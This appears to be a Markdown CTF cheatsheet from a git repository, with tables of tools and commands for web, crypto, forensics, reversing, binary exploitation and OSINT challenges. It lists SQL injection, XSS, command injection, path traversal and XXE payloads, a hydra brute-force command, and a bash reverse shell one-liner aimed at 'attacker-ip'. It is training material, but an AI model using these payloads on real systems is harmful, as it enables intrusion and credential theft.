djedi/security-cheatsheets
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
security-cheatsheets/infosec/ctf-jeopardy.md
rpriven eaee07975b
Create ctf-jeopardy.md
2025-04-15 00:39:37 -06:00

156 lines
15 KiB
Markdown
Raw Blame History

# Jeopardy-Style CTF Cheatsheet
## Web Application Security
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Hidden Content** | Browser Dev Tools, Burp Suite | `CTRL+SHIFT+I` (Browser), `Ctrl+U` (View Source) | Check HTML comments, JavaScript files, robots.txt, .git folders |
| **Cookie Manipulation** | Cookie Editor extension, Burp | Edit cookies directly in browser | Modify, decode (base64), check JWT tokens (jwt.io) |
| **SQL Injection** | sqlmap, Burp Suite | `sqlmap -u "http://target.com/page?id=1" --dbs` | Try `' OR 1=1--`, `' UNION SELECT 1,2,3--` |
| **XSS** | Browser, custom scripts | `<script>alert(1)</script>`, `<img src=x onerror=alert(1)>` | Test input fields, URL parameters, try bypass filters |
| **CSRF** | Burp Suite, custom HTML | Create forms that auto-submit | Check missing CSRF tokens, test with custom forms |
| **File Upload** | BurpSuite, custom files | Prepare malicious files, manipulate Content-Type | Try alternate extensions (.php.jpg), bypass client-side validation |
| **Directory Traversal** | Browser, curl | `../../../etc/passwd`, `..%2f..%2f..%2fetc%2fpasswd` | Try to access files outside web root |
| **Command Injection** | Browser, curl | `; ls`, `\| cat /etc/passwd`, `$(cat /flag.txt)` | Test input fields that might execute commands |
| **Server-Side Template Injection** | Custom payloads | `{{7*7}}`, `${7*7}`, `<%= 7*7 %>` | Test different template engine syntaxes |
| **Local File Inclusion** | Browser, curl | `?page=../../../etc/passwd` | Try path traversal to access local files |
| **XML External Entity (XXE)** | Custom XML payloads | `<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` | Test XML inputs for entity processing |
## Cryptography Challenges
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Caesar Cipher** | CyberChef, dcode.fr, Python | `for i in range(26): print(shift(ciphertext, i))` | Try all 26 shifts (brute force) |
| **Substitution Cipher** | quipqiup.com, dcode.fr | Frequency analysis | Look for common patterns (THE, AND) |
| **Vigenère Cipher** | CyberChef, dcode.fr | Determine key length, then solve | Find repeating patterns, use kasiski examination |
| **XOR Encryption** | CyberChef, Python | `bytes_a ^ bytes_b` (Python) | Try single-byte XOR, try known plaintext |
| **Base64** | CyberChef, terminal | `base64 -d file.txt` | Recognize by = padding at end, A-Za-z0-9+/ charset |
| **Hex Encoding** | CyberChef, Python, xxd | `xxd -r -p hex.txt` | Look for 0-9, a-f characters |
| **RSA** | RsaCtfTool, Python | `python RsaCtfTool.py --publickey key.pub --private` | Check small primes, common modulus, Fermat factorization |
| **Hash Cracking** | Hashcat, john, CrackStation | `hashcat -m 0 hash.txt wordlist.txt` | Identify hash type, use rainbow tables or brute force |
| **OpenSSL** | OpenSSL | `openssl enc -d -aes-256-cbc -in file.enc -out file.dec` | Try common passwords, check challenge hints |
| **Steganography in Ciphertext** | Visual inspection | Search for patterns, analyze character distribution | Check for hidden messages in structure of ciphertext |
| **Multi-layered Encoding** | CyberChef, custom scripts | Chain decoding operations | Work backwards, identify each layer |
## Forensics
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **File Analysis** | file, strings, xxd | `file unknown`, `strings -n 8 file`, `xxd file` | Check file type, extract readable strings |
| **Image Forensics** | exiftool, binwalk, steghide | `exiftool image.jpg`, `binwalk -e image.jpg` | Check metadata, extract hidden files |
| **LSB Steganography** | zsteg, stegsolve, OpenStego | `zsteg image.png`, `stegsolve` (GUI tool) | Check least significant bits, try different bit planes |
| **Audio Steganography** | Audacity, Sonic Visualizer | Open file, view spectogram (CTRL+3 in Audacity) | Look for patterns in spectogram, Morse code |
| **Memory Dumps** | Volatility | `vol.py -f memory.dump imageinfo`, `vol.py -f memory.dump --profile=Win7SP1x64 pslist` | Identify processes, network connections, retrieve files |
| **Disk Images** | Autopsy, FTK Imager, TestDisk | Mount image, browse filesystem | Recover deleted files, examine file system artifacts |
| **Network Captures** | Wireshark, tcpdump, NetworkMiner | `wireshark capture.pcap`, `tcpdump -r capture.pcap` | Follow TCP streams, extract files, analyze HTTP traffic |
| **PDF Analysis** | pdfid, pdf-parser, peepdf | `pdfid suspicious.pdf`, `pdf-parser -s JavaScript suspicious.pdf` | Check for hidden objects, JavaScript, embedded files |
| **USB Artifacts** | RegRipper, Autopsy | Examine Windows registry | Check setupapi logs, USB device history |
| **ZIP/Archive Analysis** | zipdetails, file-roller, foremost | `zipdetails archive.zip` | Check for hidden files, broken archives |
| **Corrupted Files** | hexedit, bless | Manual hex editing | Fix file headers, repair broken structures |
## Reverse Engineering
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Binary Analysis** | Ghidra, IDA Pro, radare2 | `r2 -A binary`, `ghidra` (GUI) | Disassemble, look for interesting functions |
| **Static Analysis** | objdump, nm, strings | `objdump -d binary`, `nm binary`, `strings binary` | Check for function names, strings, disassembly |
| **Dynamic Analysis** | GDB, PEDA, strace, ltrace | `gdb ./binary`, `strace ./binary`, `ltrace ./binary` | Set breakpoints, analyze memory, trace calls |
| **Patching Binaries** | hexedit, Ghidra, radare2 | `r2 -w binary`, patch with hex editor | Modify conditions, bypass checks |
| **Anti-debugging** | GDB scripts, strace | Set hardware breakpoints, analyze pattern | Look for time checks, debugger detection |
| **Obfuscated Code** | De-obfuscation tools, manual analysis | Rename variables, reformat code | Look for patterns, decode strings |
| **Android APK** | jadx, apktool, dex2jar | `apktool d app.apk`, `jadx-gui app.apk` | Decompile to Java, check AndroidManifest.xml |
| **Java/JAR** | JD-GUI, CFR decompiler | `java -jar cfr.jar target.jar --outputdir output` | Decompile to source, check resources |
| **Python** | uncompyle6, pyinstxtractor | `uncompyle6 script.pyc` | Decompile to source |
| **.NET/C#** | dnSpy, ILSpy | Open with dnSpy (GUI) | Decompile to source, modify and recompile |
| **Go Binaries** | Ghidra with Go plugin | Look for Go signatures | Identify main.main, recover structures |
## Binary Exploitation
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Buffer Overflow** | GDB, PEDA, pwntools | `pattern create 100`, check EIP/RIP overwrite | Find offset, control EIP, locate/create shellcode |
| **Format String** | GDB, pwntools | `%x %x %x` to leak stack, `%n` to write | Leak addresses, overwrite GOT/return addresses |
| **Return-to-Libc** | GDB, ROPgadget, pwntools | `ROPgadget --binary ./target` | Find gadgets, build ROP chain |
| **Heap Exploitation** | GDB, heapinfo, pwntools | Analyze heap structures | Understand allocator, exploit use-after-free/double-free |
| **ROP (Return Oriented Programming)** | ROPgadget, ropper | `ROPgadget --binary ./target --ropchain` | Build chain of gadgets to execute arbitrary code |
| **Integer Overflow** | GDB, code review | Find vulnerable math operations | Identify wrap-around conditions |
| **Race Conditions** | strace, custom scripts | Identify time-of-check/time-of-use issues | Create script to exploit timing windows |
| **PIE/ASLR Bypass** | GDB, info proc mappings | Leak addresses, partial overwrite | Find information leaks to determine addresses |
| **Shellcoding** | pwntools, shellcraft | `shellcraft.sh()` or custom shellcode | Create or adapt shellcode for specific scenarios |
| **Kernel Exploitation** | Specialized tools, GDB | Varies based on challenge | Understand kernel structures, find vulnerabilities |
| **SROP (Sigreturn Oriented Programming)** | pwntools | Use SigreturnFrame in pwntools | Craft fake signal frames to control registers |
## OSINT (Open Source Intelligence)
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Social Media Research** | Sherlock, Social Mapper | `sherlock username` | Search for usernames across platforms |
| **Email Investigation** | theHarvester, Hunter.io | `theHarvester -d company.com -b all` | Gather email formats, verify addresses |
| **Domain Intelligence** | Whois, nslookup, dnsrecon | `whois domain.com`, `dnsrecon -d domain.com` | Check registration, subdomains, DNS records |
| **Image Analysis** | Google Images, Yandex, TinEye | Reverse image search | Find original source, hidden locations/data |
| **Geolocation** | GeoGuessr techniques, Google Maps | Look for landmarks, signs, architecture | Identify location from visual clues |
| **Public Records** | Public databases, search engines | Advanced Google dorks | Find specific document types, information |
| **Person Research** | People search engines, public records | Search by name, location, associations | Build connections between entities |
| **Phone Numbers** | PhoneInfoga, truecaller | `phoneinfoga scan -n +1234567890` | Identify carrier, location, owner |
| **Metadata Analysis** | exiftool, metagoofil | `exiftool document.pdf` | Extract device info, location, author |
| **Wireless Networks** | Wigle.net | Search by BSSID/SSID | Find physical locations of wireless access points |
| **Website Archives** | Wayback Machine, archive.today | Check historical versions | Find deleted content, changes over time |
## Programming Challenges
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **Python Scripting** | Python, pwntools | `from pwn import *` for CTF scripts | Automate repetitive tasks, solve mathematical problems |
| **Socket Programming** | Python, netcat, pwntools | `r = remote('host', port)` | Create client to interact with remote service |
| **Parsing & Data Extraction** | Python (re, beautifulsoup4) | `import re`, `from bs4 import BeautifulSoup` | Extract patterns from text/HTML, parse structured data |
| **Algorithm Implementation** | Python, C/C++ | Implement common algorithms | Understand problem, code efficient solution |
| **Esoteric Languages** | Specialized interpreters | Research language specifications | Identify language (brainfuck, ook, etc), use interpreter |
| **Automation** | Python, Bash scripting | Create script to solve repetitive challenges | Automate multiple requests, parse responses |
| **API Interaction** | Python (requests), Postman | `import requests` | Understand API endpoints, craft proper requests |
| **SQL Challenges** | MySQL, SQLite, Python | `import sqlite3` | Create queries to extract specific data |
| **Regular Expressions** | regex101.com, Python re | `re.findall(pattern, text)` | Create patterns to match/extract specific text |
| **Cryptography Implementation** | Python (pycrypto, cryptography) | `from Crypto.Cipher import AES` | Implement encryption/decryption algorithms |
| **Computational Challenges** | Python, SageMath | Mathematical libraries | Solve number theory, optimization problems |
## Miscellaneous Techniques
| Challenge Type | Tools | Commands/Techniques | Common Approaches |
|----------------|-------|---------------------|-------------------|
| **QR Codes** | ZBar, mobile phone | `zbarimg qrcode.png` | Scan code, check for errors/modifications |
| **Morse Code** | Audio tools, online converters | Listen or visualize, convert to text | Transcribe dots/dashes, convert to ASCII |
| **Barcode** | ZBar, barcode scanners | `zbarimg barcode.png` | Identify barcode type, scan |
| **Whitespace/Nonprintable** | hexdump, xxd, specialized tools | `xxd file \| grep -v "0000"` | Look for tab/space patterns, invisible characters |
| **Brainfuck/Esoteric Languages** | Online interpreters | Identify syntax, use appropriate interpreter | Recognize patterns, find corresponding interpreter |
| **Parity Bits** | Custom scripts | Check bit patterns | Identify odd/even parity schemes |
| **Magic Numbers/File Headers** | hexedit, xxd | `xxd file \| head` | Fix incorrect file headers, identify true file type |
| **Location-based Challenges** | Google Maps, OSINT techniques | Research geographic elements | Look for coordinates, landmarks, geotags |
| **Subway/Train Maps** | Official transit maps | Research transit systems | Decode station sequences, find connections |
| **Book Ciphers** | Online databases, physical books | Identify book, apply cipher method | Look for page/line/word references |
| **3D Files/Printing** | Blender, MeshLab | Open and inspect 3D models | Look inside 3D models, check for hidden text |
| **Historic/Classical Ciphers** | dcode.fr, specialized tools | Research cipher methods | Identify cipher from clues, apply appropriate technique |
## Useful Command-Line One-Liners
| Purpose | Command | Notes |
|---------|---------|-------|
| **Extract strings from binary** | `strings -n 8 binary \| grep -i flag` | Find strings containing "flag" |
| **Find hidden text in image** | `steghide extract -sf image.jpg` | Attempts to extract without password |
| **Extract embedded files** | `binwalk -e suspicious_file` | Extracts detected files |
| **Follow TCP stream in PCAP** | `tshark -r capture.pcap -Y "tcp.stream eq 1" -T fields -e data` | Extract specific TCP stream |
| **Convert hex to ASCII** | `echo "48656c6c6f" \| xxd -r -p` | Hex to text conversion |
| **Analyze image metadata** | `exiftool -a -u image.jpg` | Shows all metadata including unknown tags |
| **Fix file signature/magic bytes** | `printf '\x89\x50\x4e\x47' \| dd of=file.png bs=1 count=4 conv=notrunc` | Fix corrupted PNG header |
| **Extract ZIP comment** | `unzip -z file.zip` | Get hidden info in ZIP comment field |
| **Get HTTP headers** | `curl -I https://example.com` | Check server headers for info |
| **Extract EXIF GPS data** | `exiftool -n -p '$GPSLatitude, $GPSLongitude' image.jpg` | Extract coordinates from image |
| **Find files modified in last 24h** | `find / -type f -mtime -1` | Recent file changes |
| **Dump HTTP response with SSL info** | `openssl s_client -connect example.com:443` | SSL certificate analysis |
| **Get favicon hash for shodan** | `curl https://example.com/favicon.ico \| openssl dgst -md5` | Favicon fingerprinting |
| **Brute force basic auth** | `hydra -l admin -P wordlist.txt example.com http-get /admin/` | Password attacks |
| **Extract SSL certificate details** | `echo \| openssl s_client -connect example.com:443 -showcerts` | Certificate analysis |
| **Check for SQL injection** | `sqlmap -u "https://example.com/page.php?id=1" --dbs` | Quick SQLi test |
| **Find writable web directories** | `find /var/www/ -type d -writable` | Identify upload targets |
| **List all open ports** | `netstat -tulpn` | Check listening services |
| **Verify file hash** | `sha256sum file.bin` | Confirm file integrity |
| **One-liner reverse shell** | `bash -i >& /dev/tcp/attacker-ip/4444 0>&1` | Basic reverse shell |
| **Convert epoch time** | `date -d @1609459200` | Translate timestamps |
Reference in a new issue View git blame Copy permalink